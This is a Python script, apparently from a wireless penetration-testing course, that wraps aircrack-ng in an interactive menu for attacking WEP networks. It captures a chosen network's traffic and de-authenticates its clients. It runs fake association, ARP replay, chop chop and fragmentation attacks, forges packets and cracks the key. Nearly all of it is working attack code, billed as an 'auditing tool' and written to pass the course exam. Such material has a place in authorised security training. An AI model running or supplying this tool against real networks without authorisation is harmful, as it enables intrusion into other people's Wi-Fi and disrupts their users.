#!/usr/bin/python
# WEP and WPA Auditing tool
# Coded by MrMe
# Uses aircrack-ng 'http://aircrack-ng.org/doku.php'
# WARNING: This script assumes you know something about wifi
# I wrote this script because I can't remember the syntax :(
# Also made to destroy the wifu exam
#
import hashlib, sys, os,fileinput, re, time, thread
from optparse import OptionParser
# Command-line interface: one option, -i <interface>, stored as options.intf.
usage = "\n".join(["./%prog -i interface", "Example: ./%prog -i ath0"])
parser = OptionParser(usage=usage)
parser.add_option(
    "-i",
    dest="intf",
    action="store",
    type="string",
    help="Your interface",
)
# Parses sys.argv at import time; leftover positional words land in args.
options, args = parser.parse_args()
def banner():
    """Print the four-line banner box to stdout."""
    rows = (
        "\n|---------------------------------------------------|",
        "| WEP & WPA auditing tool made during WIFU :) |",
        "| by MrMe 07/2009 |",
        "|---------------------------------------------------|\n",
    )
    for row in rows:
        print(row)
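def is_there_aircrack():
    """Exit with an install hint unless ``aircrack-ng`` can be run.

    Runs ``aircrack-ng`` with no arguments and looks for the project's
    site name in what it prints. If the marker is missing, the banner and
    install hints are printed and the process exits with status 1, the
    same status the usage check uses for a failed start.
    """
    pipe = os.popen("aircrack-ng")
    try:
        output = pipe.read()
    finally:
        # Close explicitly so the pipe and child are not left to the GC.
        pipe.close()
    # Plain substring test: the dots are literal and the URL scheme is not
    # pinned, so an https:// banner matches as well as an http:// one.
    if "www.aircrack-ng.org" in output:
        return
    banner()
    print("[-] Please install aircrack-ng before continuing")
    print("[-] apt-get install aircrack-ng")
    print("[-] yum install aircrack-ng")
    sys.exit(1)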
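# Validate the parsed options rather than counting argv entries: a bare
# argv-length test lets "prog x y" through with options.intf still None
# (which later fails when intf is concatenated into a command string) and
# rejects the equally valid "-iath0" spelling.
if not options.intf or args:
    banner()
    parser.print_help()
    sys.exit(1)

# some global variables
# verbose is a string flag; execute() compares it against 'true'.
verbose = 'true'
# Interface name exactly as typed on the command line. It is interpolated
# into shell command strings by the functions below.
intf = options.intf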
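def reset():
    """Reload the kernel driver module that backs the selected interface.

    Only two interfaces are mapped: ath0 (module ath_pci) and wlan0
    (module r8187). Any other interface prints a "not supported" message.
    Success is reported only when ``modprobe`` exits with status 0; the
    original printed "Loaded and ready" even when the reload had failed.
    """
    drivers = {'ath0': 'ath_pci', 'wlan0': 'r8187'}
    module = drivers.get(intf)
    if module is None:
        print("[-] Interface not supported for this option")
        return
    # rmmod stays best-effort: it also fails when the module is simply not
    # loaded, which is not a reason to skip the modprobe that follows.
    os.system("rmmod " + module)
    if os.system("modprobe " + module) != 0:
        print("\n[-] modprobe " + module + " failed, driver not reloaded")
        return
    print("\n[+] Loaded and ready")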
def targetSetup():
    """Run ``airmon-ng stop`` and then ``airmon-ng start`` for the interface.

    The stop always names the selected interface. For ath0 the start is
    issued against wifi0; every other interface is started under its own
    name. Exit statuses of both commands are ignored.
    """
    os.system("airmon-ng stop " + intf)
    start_on = 'wifi0' if intf == 'ath0' else intf
    os.system('airmon-ng start ' + start_on)
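# Colon-separated 48-bit hardware address, e.g. 00:1b:2f:67:9b:f3.
_MAC_RE = re.compile(r"\A[0-9A-Fa-f]{2}(?::[0-9A-Fa-f]{2}){5}\Z")


def _sh_quote(value):
    """Return *value* quoted so the shell reads it as one literal word."""
    try:
        from shlex import quote  # Python 3
    except ImportError:
        from pipes import quote  # Python 2
    return quote(value)


def _prompt_mac(prompt, label):
    """Ask until the answer is a well-formed colon-separated MAC address."""
    value = raw_input(prompt)
    while not _MAC_RE.match(value):
        print('\n[-] Check your ' + label
              + ' and enter it again. Eg: 00:1b:2f:67:9b:f3')
        value = raw_input(prompt)
    return value


def execute():
    """Run the interactive menu until the operator picks option 13 (Exit).

    Option 2 collects the target details (channel, BSSID, ESSID and the
    local MAC); options 3-12 reuse them on later passes through the loop.

    Changes against the original body:

    * Options 3-12 are refused until option 2 has stored a target. They
      used to raise an unbound-variable error instead.
    * Option 3 reads the command output once. The original read the pipe
      twice, so its "No such BSSID" check ran on an empty string whenever
      the output had already been printed.
    * Every command is a shell string passed to os.system / os.popen. The
      ESSID is a name advertised by the access point, so it is not under
      the operator's control; it is shell-quoted before interpolation.
      MAC addresses must match a strict pattern (a 17-character length
      test accepted any text) and the channel must be all digits.

    ``intf`` comes from the operator's own command line and is still
    interpolated as typed.
    """
    menu = (
        "\n|--------------------------------|",
        "| Select an option type |",
        "|--------------------------------|\n",
        "[1] Reset the driver modules",
        "[2] Setup wifi NIC and choose target",
        "[3] Injection test against target",
        "[4] De-authenticate a client",
        "[5] Fake associate with the AP",
        "[6] Shared key fake association",
        "[7] Interactive packet replay",
        "[8] Arp request replay",
        "[9] Korek chop chop attack",
        "[10] Fragmentation attack",
        "[11] Forge and inject using the xor file",
        "[12] Crack the WEP key",
        "[13] Exit\n",
    )
    needs_target = set(str(n) for n in range(3, 13))
    # Target state, filled in by option 2 and kept across loop passes.
    bssid = essid = essid_arg = mymac = ch = None

    while True:
        for row in menu:
            print(row)
        option = raw_input('[+] Please enter a value: ')

        if option == '13':
            print("[+] Hope you had fun")
            sys.exit(0)

        if option in needs_target and bssid is None:
            print("[-] No target set yet, run option 2 first")
            continue

        if option == '1':
            reset()

        elif option == '2':
            targetSetup()
            print("\n[+] Gathering target information..")
            airo = 'xterm -T "Searching for target AP\'s" -e airodump-ng '+intf
            # Keep the pipe referenced: dropping it would close it, and
            # closing a popen pipe waits for the child window to exit.
            scan_pipe = os.popen(airo)
            time.sleep(3)
            ch = raw_input('[+] Please enter target channel: ')
            bssid = _prompt_mac('[+] Please enter the target BSSID: ', 'BSSID')
            essid = raw_input('[+] Please enter the target ESSID: ')
            mymac = _prompt_mac(
                '[+] Please enter the MAC addess for '+intf+': ', 'MAC address')
            # The channel goes onto a command line unquoted, so it must be
            # digits only; an empty ESSID is rejected as before.
            if not essid or not ch.isdigit():
                print('\n[-] Please enter the details correctly next time.. exiting..')
                sys.exit(0)
            essid_arg = _sh_quote(essid)
            print("[+] Setting up your interface for the specifid target..")
            os.system("airmon-ng stop "+intf)
            if intf == 'ath0':
                os.system('airmon-ng start wifi0 '+ch)
            else:
                os.system('airmon-ng start '+intf+' '+ch)
            dump = ('xterm -T "Dumping target" -e airodump-ng -c '+ch
                    +' --bssid '+bssid+' -w '+essid_arg+' '+intf+' &')
            os.system(dump)
            time.sleep(3)
            print('\n[+] Ready to rock and roll! :)')

        elif option == '3':
            print("[+] Testing AP please wait..")
            test1 = 'aireplay-ng -9 -e '+essid_arg+' -a '+bssid+' '+intf
            pipe = os.popen(test1)
            if verbose == 'true':
                print("[+] Command: "+test1+'\n')
            # Read once and reuse: a second read() on the pipe is empty.
            output = pipe.read()
            pipe.close()
            if verbose == 'true':
                print(output)
            if re.search("No such BSSID", output):
                print("[-] Please check your BSSID!")
                sys.exit(0)
            else:
                print("[+] Injection is working!")

        elif option == '4':
            client = _prompt_mac(
                '[+] Please enter the targets clients MAC: ', 'client MAC')
            print("[+] Deauth'ing with 1 packets please wait..")
            attack2 = ('aireplay-ng -0 1 -e '+essid_arg+' -a '+bssid
                       +' -c '+client+' '+intf)
            pipe = os.popen(attack2)
            if verbose == 'true':
                print('[+] Command: "'+attack2+'"\n')
                print(pipe.read())
            pipe.close()

        elif option == '5':
            print("[+] Associating with the AP please wait..")
            test1 = ('aireplay-ng -1 0 -e '+essid_arg+' -a '+bssid
                     +' -h '+mymac+' '+intf)
            pipe = os.popen(test1)
            if verbose == 'true':
                print('[+] Command: "'+test1+'"\n')
                print(pipe.read())
            pipe.close()

        elif option == '6':
            print("[+] Associating with the AP please wait..")
            print("[+] Using shared key..")
            # The quoted ESSID is a literal prefix; only *.xor is a glob.
            asso = ('aireplay-ng -1 0 -e '+essid_arg+' -y '+essid_arg
                    +'*.xor -a '+bssid+' -h '+mymac+' '+intf)
            pipe = os.popen(asso)
            if verbose == 'true':
                print('[+] Command: "'+asso+'"\n')
                print(pipe.read())
            pipe.close()

        elif option == '7':
            print("[+] Starting interactive packet replay attack..")
            inter = 'aireplay-ng -2 -b '+bssid+' -d FF:FF:FF:FF:FF:FF -t 1 '+intf
            if verbose == 'true':
                print("[+] Command: "+inter+'\n')
            print("[+] Now try deauth'ing a client or wait..")
            print("[+] If you get a ARP packet then crack the key")
            os.system(inter)

        elif option == '8':
            print("[+] Starting ARP request replay attack..")
            print("[+] If you get a ARP packet then crack the key")
            arp = 'aireplay-ng -3 -b '+bssid+' -h '+mymac+' '+intf
            if verbose == 'true':
                print("[+] Command: "+arp+'\n')
            os.system(arp)

        elif option == '9':
            print("[+] Starting Korek chop chop attack..")
            chop = 'aireplay-ng -4 -h '+mymac+' -b '+bssid+' '+intf
            if verbose == 'true':
                print('[+] Command: "'+chop+'"\n')
            os.system(chop)

        elif option == '10':
            print("[+] Starting fragmentation attack..")
            frag = 'aireplay-ng -5 -b '+bssid+' -h '+mymac+' '+intf
            if verbose == 'true':
                print('[+] Command: "'+frag+'"\n')
            os.system(frag)

        elif option == '11':
            print("[+] Forging arbitary data packet..")
            forge = ('packetforge-ng -0 -a '+bssid+' -h '+mymac
                     +' -k 255.255.255.255 -l 255.255.255.255 -y *.xor -w arp-request')
            if verbose == 'true':
                print('[+] Command: "'+forge+'"\n')
            os.system(forge)
            print("[+] Now lets inject the forged packet :)")
            inject = 'xterm -T "Injecting forged packet" -e "aireplay-ng -2 -r arp-request "'+intf+' &'
            os.system(inject)
            time.sleep(3)

        elif option == '12':
            print("[+] Crack time!")
            print("[+] aircrack-ng -0 -z "+essid_arg+"*.cap\n")
            # xterm gets the inner command as one word, as before. That
            # word is parsed a second time, so it is quoted as a whole on
            # top of the ESSID quoting inside it.
            inner = 'aircrack-ng -0 -z '+essid_arg+'*.cap; bash'
            crack = 'xterm -T "Cracking.." -e '+_sh_quote(inner)
            os.system(crack)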
# Start-up sequence; the order matters. The dependency check comes first
# and exits the process itself when aircrack-ng is not found. After that
# the banner is printed and control passes to the interactive menu loop.
is_there_aircrack()
banner()
execute()